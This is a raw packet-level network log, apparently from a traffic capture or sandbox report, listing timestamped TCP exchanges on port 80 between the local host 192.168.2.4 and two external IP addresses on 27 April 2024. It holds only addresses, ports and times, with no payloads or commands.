Apr 27, 2024 02:19:07.241513968 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.241596937 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.241648912 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.241703033 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.241959095 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.242011070 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.242059946 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.242111921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.277726889 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.278026104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.278076887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.278141022 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.293226004 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.293354034 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.311057091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.311141014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.311196089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.311232090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.311264992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.311338902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.311342955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.311394930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.311448097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.311547041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.311551094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.311597109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.311609030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.311687946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.311738968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.311777115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.311860085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.311975956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.312014103 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.355802059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.366503000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.366600990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.366662979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.409852982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.411437988 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.411508083 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.411549091 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.411593914 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.411676884 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.411694050 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.411736965 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.411766052 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.411788940 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.411936998 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.411989927 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.412046909 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.464389086 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.465200901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.465238094 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.473761082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.473803043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.473866940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.474001884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.506721020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.506762028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.506792068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.506828070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.506829977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.506855011 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.506856918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.506886959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.506912947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.506916046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.506951094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.506977081 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.506987095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.507029057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.507039070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.507059097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.507086992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.507114887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.507145882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.507164955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.551685095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.562207937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.562303066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.562362909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.581711054 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.581795931 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.581877947 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.581877947 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.581931114 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.581965923 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.582016945 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.582066059 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.582118034 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.582182884 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.582240105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.582262993 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.582336903 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.605808020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.636394978 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.636457920 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.636497021 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.636550903 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.660527945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.668901920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.668963909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.668986082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.702321053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.702343941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.702358961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.702375889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.702393055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.702409029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.702414036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.702425957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.702446938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.702469110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.702485085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.702502012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.702521086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.702527046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.702539921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.702558041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.702559948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.702596903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.753122091 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.753148079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.753159046 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.753170013 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.753180027 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.753228903 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.753307104 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.758630991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.758703947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.758868933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.801398039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.807581902 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.807650089 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.807682037 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.807743073 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.807786942 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.807848930 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.855916977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.867546082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.867691994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.867778063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.912992954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.913099051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.913189888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.913228989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.913289070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.913290024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.913350105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.913352966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.913403034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.914033890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.914097071 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.914103985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.914155960 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.914191961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.914273977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.914283991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.914333105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.914369106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.914417028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.914506912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.914572954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.914587021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.914639950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.914659023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.914710045 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.927258015 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.927275896 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.927293062 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.927354097 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.927354097 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.927429914 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.927448034 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.927464008 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.927484989 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.927506924 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.956847906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.956912041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.957026958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.957093000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.982105970 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.982168913 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.982292891 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.982311010 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.982342958 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.982362032 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.982363939 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.982409954 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.054358959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.054456949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.099524021 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.099569082 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.099679947 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.099824905 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.099833012 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.100014925 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.109582901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.109658003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.109675884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.109944105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.110296965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.110316038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.110382080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.110522985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.110541105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.110558033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.110604048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.110636950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.110925913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.111089945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.111108065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.111140013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.152785063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.153007984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.153027058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.153079033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.154076099 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.154093981 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.154135942 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.154161930 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.154172897 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.154205084 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.154207945 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.154236078 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.154278994 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.248505116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.271547079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.271596909 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.271656990 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.271666050 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.271739006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.271783113 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.271790981 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.271876097 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.293447971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.305319071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.305422068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.305478096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.305502892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.305521965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.305594921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.305593967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.305629015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.305645943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.305694103 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.305730104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.305779934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.305808067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.306271076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.306322098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.306339979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.321584940 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.321805000 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.326452017 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.326518059 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.326560020 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.326565027 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.326586962 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.326598883 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.326647997 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.326675892 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.348701954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.348789930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.348789930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.348874092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.348931074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.444025993 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.444137096 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.444180012 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.444225073 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.488940954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.493503094 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.493628979 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.497668982 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.497736931 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.498290062 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.498347044 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.498349905 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.498418093 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.498434067 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.498467922 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.500416040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.500473976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.500483036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.500530958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.500550032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.500579119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.500669956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.500721931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.500785112 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.500806093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.500838995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.500860929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.500941992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.501007080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.501211882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.501260042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.501310110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.544332981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.544383049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.544399023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.544472933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.544523001 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.544565916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.615552902 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.615586996 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.615761995 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.615761995 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.664710999 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.664732933 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.664848089 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.668453932 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.668566942 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.669348955 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.669368029 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.669409990 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.669423103 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.669435024 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.669473886 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.695230007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.695250034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.695291042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.695307970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.695331097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.695461035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.695478916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.695533037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.695533991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.695580959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.695600986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.695655107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.695688963 CEST	80	49734	176.97.76.106	192.168.2.4
